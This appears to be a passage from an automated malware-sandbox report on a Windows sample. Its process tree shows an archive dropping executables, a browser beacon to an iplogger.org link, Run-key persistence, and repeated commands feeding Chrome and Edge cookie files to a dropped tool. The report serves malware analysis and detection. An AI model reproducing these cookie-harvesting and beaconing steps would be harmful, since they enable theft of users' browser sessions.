1096 1008 rUNdlL32.eXe rundll32.exe PID 1008 wrote to memory of 1096 1008 rUNdlL32.eXe rundll32.exe PID 1432 wrote to memory of 1096 1432 WerFault.exe rundll32.exe PID 1432 wrote to memory of 1096 1432 WerFault.exe rundll32.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2368 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2460 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 2460 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 3924 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 3924 5040 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8361035979723908611,2187179552756112428,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5112 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\6fb0NKLzbR9O1Hnpb8meEjoY.exe"C:\Users\Admin\Documents\6fb0NKLzbR9O1Hnpb8meEjoY.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\S9vvbu_thmJNivbyrd5cbgjY.exe"C:\Users\Admin\Documents\S9vvbu_thmJNivbyrd5cbgjY.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2964⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\1JXoSiUoBQDRFxKQt6PfAJQT.exe"C:\Users\Admin\Documents\1JXoSiUoBQDRFxKQt6PfAJQT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 2964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\ZM0tOe8uO666xAL03x_SEt7G.exe"C:\Users\Admin\Documents\ZM0tOe8uO666xAL03x_SEt7G.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe"C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exeC:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exeC:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe4⤵
-
C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exeC:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\OaUqDiJqLrReD6nAIAxVSWA8.exe"C:\Users\Admin\Documents\OaUqDiJqLrReD6nAIAxVSWA8.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe"C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exeC:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exeC:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exeC:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"4⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"5⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1a0,0x1a4,0x1a8,0x130,0x1ac,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb47186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4416 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5688 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6168 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6328 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6464 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:86⤵
-
